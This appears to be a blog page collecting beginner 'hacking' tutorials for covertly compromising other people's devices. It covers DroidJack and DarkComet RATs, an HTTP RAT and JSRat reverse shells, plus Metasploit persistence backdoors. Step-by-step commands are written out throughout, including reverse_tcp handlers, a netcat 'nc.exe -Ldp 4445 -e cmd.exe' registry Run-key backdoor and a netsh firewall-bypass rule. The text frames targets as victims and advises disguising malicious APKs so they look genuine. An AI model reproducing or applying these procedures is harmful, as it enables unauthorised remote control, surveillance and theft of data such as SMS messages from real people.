Showing posts with label Keylogger and Trojan. Show all posts
Showing posts with label Keylogger and Trojan. Show all posts

Hack Any Android Phone with DroidJack (Beginner's Guide)

DroidJack is an android RAT which gives you the power to establish control over your victim's Android devices with an easy to use GUI and all the features you need to monitor them.


First of all download DroidJack  from http://droidjack.net/ .


Now execute the DroidJack which is a executable jar file . Then it will prompt you for login , so enter your username and password .


Now clicking on unlock button will open a GUI interface .


Now click on Generate APK and then edit App Name and File Name with the name of your choice so that it looks genuine. Also enter the IP of your system in the Dynamic DNS field and enter the port no. of your system in the Port Number field and then click on Generate.


After some time it will generate a prompt showing that the APK is successfully generated and can be found in the same folder as your DroidJack application.


So now go to Devices and set the port field in the lower left corner to the same port with which you have generated the APK as in my case it is 1337 and then click on Reception  to start the listening mode.


Now send the apk RAT to your victim by any means .


After installing the app ,when the victim click on button we will get the android session. 



As you can see below the phone is  listed in Devices list.


Now right clicking on the mobile device will give a list of options which you can use.


Now for demo purpose i  have used SMS  Trekker and as you can see it has dumped all the SMS.

HTTP RAT Tutorial for Beginners

HTTP RAT is a kind of Remote Access Trojan which utilizes web interfaces and port 80 to gain access. It can be understood simply as a HTTP Tunnel, except it works in the reverse direction. These Trojans are comparatively more dangerous as these work on web and thus work almost everywhere where you can find internet.

Here, we would be working with HTTP RAT backdoor webserver by zombie


So download the above from internet and extract the tool. It would something like as shown in the pic below


Double click on the folder and click on the icon with httprat written next to it. Something like this pic pops up on the screen.


Click on create. This is what should pop out on screen.


An icon less application with httpserver must be created as in this pic:


Send this file to the victim via pendrive or any other means . Once the victim double clicks on the application, it will automatically sends a connection back to you. You just need to type the victim’s IP address on the browser. This is what will come on the screen


5 ways to Create Permanent Backdoor in Remote PC

First take the meterpreter shell from any known exploit and bypass UAC for better results .Then   run command:

persistence

run persistence –X –i 10 –p 443 –r 192.168.0.105

-X=connect back when the system boots
-i 10=try to connect back every 10 seconds
-p 443=reverse connection port
-r ip=reverse connection ip
After successfully executing the script, reboot the system and then use exploit:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 443
set lhost 192.168.0.105

exploit


s4u_persistence


Now type use exploit/windows/local/s4u_persistence
msf exploit (s4u_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (s4u_persistence)>set lhost 192.168.0.137 (IP address of kali Linux)
msf exploit (s4u_persistence)>set lport 443
msf exploit (s4u_persistence)>set trigger logon
msf exploit (s4u_persistence)>exploit

Now after successful backdoor creation, restart the victim pc you can see the previous meterpreter session is closed and then run command:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.137
exploit


VSS_PERSISTENCE
This module will attempt to create a persistent payload in a new volume shadow copy. This is based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY option, the user should need password in order to start session on the target machine.

First take the meterpreter shell and bypass UAC by any known technique and then background the session .Then run series of commands:

Now type use exploit/windows/local/vss_persistence
msf exploit (vss_persistence)>set runkey true
msf exploit (vss_persistence)>set schtask true
msf exploit (vss_persistence)>set rhost 192.168.222.137
msf exploit vss_persistence)>set session 2
msf exploit (vss_persistence)>exploit 

Now run exploit which will create a backdoor and will give a meterpreter session. 


Now background it and use the multi handler and also set the payload with commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4444
exploit

Now restart the victim system and the meterpreter session will die, and then run: exploit after restarting the system it will give a reverse meterpreter shell.


REGISTRY PERSISTENCE
This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in registry
First background the meterpreter session and then run commands:

Now type use exploit/windows/local/registry_persistence
msf exploit (registry_persistence)>set payload windows/meterpreter/reverse_tcp
msf exploit (registry_persistence)>set lhost 192.168.222.135 (IP address of kali Linux)
msf exploit (registry_persistence)>set lport 4545
msf exploit (registry_persistence)>set startup system
msf exploit (registry_persistence)>set session 1
msf exploit (registry_persistence)>exploit


Now set up your system for reverse connection. Run the following commands on your msfconsole:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.222.135
set lport 4545
exploit

Now restart the victim pc and your previous meterpreter session will die, so now run the exploit:
After restarting you will get the reverse meterpreter shell as you can see in my case


 NETCAT

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

After getting the meterpreter shell and bypassing UAC run the following command:
upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32


Now set the registry value with the following command:
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'


Now get the command shell with command:
Shell and then bypass the firewall on the victim system by adding firewall rules with shell command:
netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445


Now check whether the rules are added successfully with the command:
netsh firewall show portopening
As you can see the the firewall rule netcat is added successfully.


Now after restarting of the victim system , run the following command on the terminal:
nc  -nv 192.168.0.101 4445
Here 192.168.0.101 is the victim system you previously created backdoor and 4445 is the port you gave while setting the registry value.
After successful running the command you will get the command shell.

Hack Windows Server in Network using Atelier Web Remote Command

Every geek, system administer  and help-desk personnel love the feature of accessing computers or laptops remotely but we also know that accessing a computer remotely requires that we have to install the same software on the remote computer as well as on our computer. But Atelier Web Remote Commander (AWRC) is a powerful tool for every geeks and system administrators because it can connect to other computers without installing any software or without any configuration on the remote computer.
Atelier Web Remote Commander (AWRC) Features:
·         Runs across firewalls.
·         Performs deep audits and all kinds of maintenance operations.
·         Does not leave traces on remote. It is absolutely safe.
·         Zero configuration simultaneous connections.
Now let’s see practical working of this tool.


Download Atelier Web Remote Commander from here  and install and open.


In Remote Host column type IP address of the computer or server, you want to get a remote desktop connection, after that give User Name and Password and click on Connect.

After few seconds, you can see that a desktop of a remote computer appears in front of you. Now you can see information of the remote system and access file of the remote computer.


Go to SysInfo tab, here you see all information related to remote computer like version of running OS, BIOS information, details of memory, etc.


In NetworkInfo section, you will get most interesting information about the remote system like routing table, running protocols, open ports, IP statistics, etc.


FileSystem tab will give you access to file system of a remote computer, where you access all files and data on all drives.


UserGroup section will give you details of all created accounts and its privileges and in which group that user account is connected.


If you want to chat or tell something to remote computer user you can also do that, simply start Chat window and type whatever you want to say and hit enter.


OUTPUT of remote victims computer.


Hack Remote Windows 10 PC using JSRat

JSRAT is a Simple JS Reverse Shell over HTTP for Windows, We run web server and then execute commands against the connecting Client/Victim. So you can now run the attack server from any OS instead of being limited to a Windows OS with Powershell enabled.

Open your kali Linux terminal and type the following command


https://github.com/Hood3dRob1n/JSRat-Py.git


Now go to the jsrat foler using cd JSRAT-Py and the following command to run jsrat

./JSRAT.py  –i  192.168.0.140 –p 80 


Now Server is Up and Listening. Copy Client Command link i.e. http://192.168.0.140:80/wtf and send it to the victim. As the victim opens the link in the browser a snippet will appear like this.


Copy that snippet and paste in the cmd shell of victim.


As soon as the victim executes it you will get a reverse connection back in your kali terminal.

Hack Remote PC using DARKCOMET RAT with Metasploit

Download DarkcometRAT From here After downloading Darkcomet unzip the archive file

Set the location of darkcomet and type “wine DarkComet.exe


First open DARKCOMET RAT and click on ‘I Accept’ (bottom right side of the screen)


In next screen click on DARKCOMET RAT then select Server module option and click on Minimalist


In this option it will display a form, fill the ID with your name, IP Address and desired Port No. Also add the destination path where you want to save the .exe file then click on Normal


Now save it on your desktop.


Again open DARKCOMET RAT and select listen to new port option


Now enter the port number used in the form above and click on Listen


Now hack victim’s PC using Metasploit How to Hack Remote PC
Now you’ll get a meterpreter of victim’s PC. Use upload command to upload your backdoor exe file which you created using darkcomet
Upload /root/Desktop/updates.exe d:\\
Now type shell to get the command prompt of victim’s PC. And run uploaded exe file


Now you can get the session of victim’s PC. See the screenshot below:


Click on system info you can see the whole system information of victim’s PC